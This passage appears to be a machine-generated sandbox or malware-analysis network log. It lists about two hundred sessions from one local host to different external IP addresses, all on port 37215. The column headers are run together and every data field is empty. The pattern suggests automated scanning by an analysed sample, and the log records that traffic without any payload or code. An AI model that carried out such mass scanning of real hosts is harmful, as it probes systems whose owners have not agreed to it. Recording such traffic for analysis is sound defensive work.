                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9712192.168.2.135040041.171.108.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9713192.168.2.134007496.205.251.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9714192.168.2.135827424.57.133.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9715192.168.2.1352880210.210.197.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9716192.168.2.1333764157.136.49.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9717192.168.2.135490441.112.248.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9718192.168.2.133555241.199.136.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9719192.168.2.1337550157.84.91.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9720192.168.2.134469241.1.2.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9721192.168.2.133619041.111.41.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9722192.168.2.1354138197.173.66.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9723192.168.2.1338650147.15.78.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9724192.168.2.133775641.223.26.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9725192.168.2.134403841.11.75.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9726192.168.2.1338530157.148.92.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9727192.168.2.1359450157.68.47.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9728192.168.2.134211641.107.109.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9729192.168.2.1351890197.12.45.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9730192.168.2.1359054157.109.140.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9731192.168.2.1344898197.125.107.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9732192.168.2.136048241.110.133.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9733192.168.2.1345042197.54.37.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9734192.168.2.1347758157.82.150.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9735192.168.2.1358910157.147.106.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9736192.168.2.135059241.6.227.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9737192.168.2.136010494.145.29.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9738192.168.2.1352594217.147.206.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9739192.168.2.1344540197.159.59.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9740192.168.2.1352922157.125.52.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9741192.168.2.1355486157.134.195.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9742192.168.2.13502189.231.74.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9743192.168.2.1360948135.55.165.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9744192.168.2.1352296157.134.39.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9745192.168.2.1348670197.125.203.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9746192.168.2.1345782197.11.250.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9747192.168.2.1339374197.100.115.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9748192.168.2.134026059.28.4.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9749192.168.2.135691641.185.59.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9750192.168.2.1352254196.129.107.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9751192.168.2.133514041.142.254.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9752192.168.2.1360878197.112.155.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9753192.168.2.135165041.8.44.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9754192.168.2.1352920156.185.126.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9755192.168.2.1360848116.93.54.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9756192.168.2.135699865.245.181.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9757192.168.2.135358241.200.194.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9758192.168.2.1344436157.201.185.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9759192.168.2.133850441.240.35.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9760192.168.2.1332986197.72.90.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9761192.168.2.135773241.250.228.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9762192.168.2.1337920157.163.167.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9763192.168.2.134286482.158.40.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9764192.168.2.133635241.112.223.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9765192.168.2.136090614.79.192.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9766192.168.2.1347932197.117.23.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9767192.168.2.1344626197.157.40.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9768192.168.2.1357738157.29.6.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9769192.168.2.135609441.174.114.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9770192.168.2.1343302197.189.20.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9771192.168.2.1347092197.165.78.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9772192.168.2.134578241.179.23.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9773192.168.2.1355970157.119.15.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9774192.168.2.1345700157.54.200.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9775192.168.2.1351736157.60.35.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9776192.168.2.1343784145.145.47.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9777192.168.2.134575413.104.7.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9778192.168.2.134163261.120.147.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9779192.168.2.135149846.135.192.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9780192.168.2.1339588157.38.47.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9781192.168.2.1360408157.212.58.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9782192.168.2.133967641.115.233.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9783192.168.2.135498441.155.58.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9784192.168.2.1358968197.18.170.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9785192.168.2.1340640197.73.195.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9786192.168.2.134893441.146.174.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9787192.168.2.1360700197.187.87.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9788192.168.2.1347562197.244.29.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9789192.168.2.1350924197.132.4.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9790192.168.2.1347414119.140.129.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9791192.168.2.1340534158.198.158.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9792192.168.2.1354476197.197.116.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9793192.168.2.1360582197.71.77.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9794192.168.2.1358382157.179.234.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9795192.168.2.133756041.105.17.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9796192.168.2.135535841.253.242.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9797192.168.2.134623041.37.224.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9798192.168.2.1351076157.158.10.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9799192.168.2.1337710220.199.172.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9800192.168.2.1349096197.209.66.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9801192.168.2.133609841.47.53.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9802192.168.2.1337760197.218.213.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9803192.168.2.133926413.58.154.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9804192.168.2.134389041.197.204.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9805192.168.2.133775841.56.225.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9806192.168.2.133841841.45.87.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9807192.168.2.133676241.170.138.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9808192.168.2.1360368197.57.33.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9809192.168.2.135189665.126.63.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9810192.168.2.133984441.150.215.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9811192.168.2.1346340197.88.150.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9812192.168.2.1355098157.78.59.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9813192.168.2.1336826157.161.193.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9814192.168.2.1345606182.144.8.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9815192.168.2.1351932197.224.177.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9816192.168.2.1342574157.100.55.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9817192.168.2.1357178157.180.167.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9818192.168.2.1339824197.13.148.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9819192.168.2.1336702197.93.92.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9820192.168.2.133598064.151.177.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9821192.168.2.1351958197.87.58.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9822192.168.2.1349648197.3.20.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9823192.168.2.134066241.27.6.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9824192.168.2.134384041.238.127.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9825192.168.2.1352572197.198.158.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9826192.168.2.1340678182.206.192.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9827192.168.2.134038841.8.171.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9828192.168.2.134944041.182.184.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9829192.168.2.1334434132.225.63.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9830192.168.2.134605841.27.197.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9831192.168.2.1339850157.29.66.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9832192.168.2.133483641.197.74.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9833192.168.2.1340414197.118.189.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9834192.168.2.1360070157.187.10.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9835192.168.2.1350022157.29.88.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9836192.168.2.135097441.169.90.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9837192.168.2.1336868197.98.4.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9838192.168.2.1356996197.122.27.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9839192.168.2.1350254166.30.49.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9840192.168.2.1355104197.48.192.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9841192.168.2.134839041.17.228.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9842192.168.2.1337670106.144.10.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9843192.168.2.134427441.98.253.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9844192.168.2.1355826186.228.107.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9845192.168.2.13351968.173.142.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9846192.168.2.1333708197.36.198.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9847192.168.2.1343572157.238.186.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9848192.168.2.1351962197.143.206.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9849192.168.2.134810841.101.212.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9850192.168.2.1334296157.217.75.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9851192.168.2.1358002102.155.19.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9852192.168.2.1360132157.55.224.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9853192.168.2.1343738157.166.22.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9854192.168.2.133300280.28.100.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9855192.168.2.1347166157.7.237.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9856192.168.2.135061241.243.11.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9857192.168.2.1352126197.30.235.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9858192.168.2.1351526197.236.21.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9859192.168.2.1357940206.50.74.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9860192.168.2.1344936157.217.63.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9861192.168.2.1352740157.95.154.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9862192.168.2.1333570197.44.145.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9863192.168.2.1338594197.72.188.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9864192.168.2.1357508134.61.74.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9865192.168.2.1337700197.254.43.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9866192.168.2.1345786157.189.59.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9867192.168.2.1350516157.77.20.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9868192.168.2.134723641.25.123.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9869192.168.2.1335188153.225.73.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9870192.168.2.1357520157.56.16.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9871192.168.2.1352324189.23.164.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9872192.168.2.133415292.57.166.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9873192.168.2.1351584157.34.214.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9874192.168.2.1347338197.216.36.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9875192.168.2.1334066197.210.146.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9876192.168.2.134291641.75.30.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9877192.168.2.1355986157.130.73.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9878192.168.2.133948241.213.192.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9879192.168.2.1345370197.157.101.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9880192.168.2.1334370156.200.70.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9881192.168.2.1352424135.227.162.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9882192.168.2.134677441.152.180.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9883192.168.2.1358930197.33.145.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9884192.168.2.1334250197.93.2.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9885192.168.2.1354266197.103.139.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9886192.168.2.1350666197.126.27.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9887192.168.2.133430041.155.143.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9888192.168.2.1356252197.44.44.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9889192.168.2.1352026157.139.17.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9890192.168.2.134542041.58.121.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9891192.168.2.1355874190.42.102.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9892192.168.2.1346342168.29.42.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9893192.168.2.1350122197.96.29.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9894192.168.2.134965041.122.208.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9895192.168.2.1351442157.228.130.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9896192.168.2.135781641.4.124.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9897192.168.2.133864241.111.23.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9898192.168.2.133325841.230.180.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9899192.168.2.1334612197.127.124.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9900192.168.2.133409841.97.67.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9901192.168.2.1333538157.57.174.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9902192.168.2.1352792157.23.18.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9903192.168.2.1360086197.39.27.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9904192.168.2.1338570197.63.254.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9905192.168.2.1339056157.156.119.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9906192.168.2.1341886157.1.7.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9907192.168.2.1341598197.142.128.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9908192.168.2.1338400157.83.18.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9909192.168.2.134251872.224.16.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9910192.168.2.1346610197.175.243.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9911192.168.2.1332938135.156.171.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9912192.168.2.134330031.156.56.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9913192.168.2.134377441.210.36.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9914192.168.2.135932241.136.178.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9915192.168.2.135013641.143.100.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9916192.168.2.133697441.41.209.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9917192.168.2.134220441.9.189.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9918192.168.2.1351388157.41.176.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9919192.168.2.1345622197.175.14.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9920192.168.2.1341980197.108.76.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
